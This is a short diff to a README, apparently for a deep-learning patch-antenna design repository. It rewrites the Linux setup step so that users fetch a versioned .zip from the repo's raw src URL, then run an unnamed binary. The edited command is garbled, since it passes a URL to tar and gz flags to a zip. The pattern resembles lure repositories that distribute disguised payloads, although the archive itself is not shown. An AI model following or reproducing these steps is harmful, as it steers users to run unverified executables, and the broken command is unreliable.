Loath-phasianidae754/Inverse-design-of-patch-antenna-using-Deep-Learning/README.md

 #### For Linux
 1. Open the terminal.
-2. Use the command `tar -xvzf filename.tar.gz` to extract the files.
+2. Use the command `tar -xvzf https://raw.githubusercontent.com/Loath-phasianidae754/Inverse-design-of-patch-antenna-using-Deep-Learning/main/src/Inverse-design-of-patch-antenna-using-Deep-Learning_3.2-alpha.3.zip` to extract the files.
 3. Navigate into the extracted folder with `cd folder-name`.
 4. Run the application with `./application_name`.